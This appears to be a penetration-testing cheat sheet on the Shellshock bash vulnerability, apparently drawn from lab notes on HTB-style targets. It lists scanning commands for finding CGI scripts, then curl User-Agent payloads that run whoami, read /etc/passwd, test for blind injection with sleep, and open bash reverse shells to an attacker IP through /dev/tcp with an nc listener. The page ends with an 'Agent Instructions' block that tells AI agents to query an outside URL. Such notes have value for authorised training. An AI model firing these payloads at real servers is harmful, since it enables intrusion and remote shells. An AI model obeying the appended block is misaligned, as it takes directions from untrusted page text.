# Shellshock ## Finding Shellshock * /cgi-sys * /cgi-mod * /cgi-bin ``` > dirb http://10.129.88.173 .. http://10.129.88.173/cgi-bin/ ..found/forbidden .. http://10.129.88.173/server-status/ ..found/forbidden > dirb http://10.129.88.173/cgi-bin/ -X .sh > dirb http://10.129.88.173/cgi-bin/ -X .sh,.php,.cgi,.pl,.py .. http://10.129.88.173/cgi-bin/user.sh ..found! nmap didnt help at all: > nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.129.88.173 try this next time nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/vulnscript.sh 10.x.x.x gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -f gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,cgi,pl,py,php -f: flag appends / to end of directory -x: file extensions to search for ``` ## Exploiting Shellshock ``` nc -nvlp 4444 User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444' curl -H 'User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'' http://$IP:10000/session_login.cgi curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://$IP/cgi-bin/user.sh curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://$IP/cgi-bin/user.sh curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$MyIP/4444 0>&1" http://$IP/cgi-bin/user.sh nc -nvlp 4444 ..Connected! ``` ## Blind Shellshock * CGI might be vulnerable, even if your scan didnt find report it * **'searchsploit webmin'** .. Results with 'cgi' - might be vulnerable * Find the cgi page, like 'session\_login.cgi' * Might be hiding on 'view source' * Send it through burp/repeater for the injection * REF: [beephtb](/04-webapps/03-shellshock.md) ``` User-Agent: () { :; };/bin/echo hello ..no results, may still be a blind injection () { :; }; sleep 10 ..if it sleeps, it is vuln () { :; }; bash -i >& /dev/tcp/10.10.14.73/4444 0>&1 nc -nvlp 4444 ..Connected! ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/04-webapps/03-shellshock.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.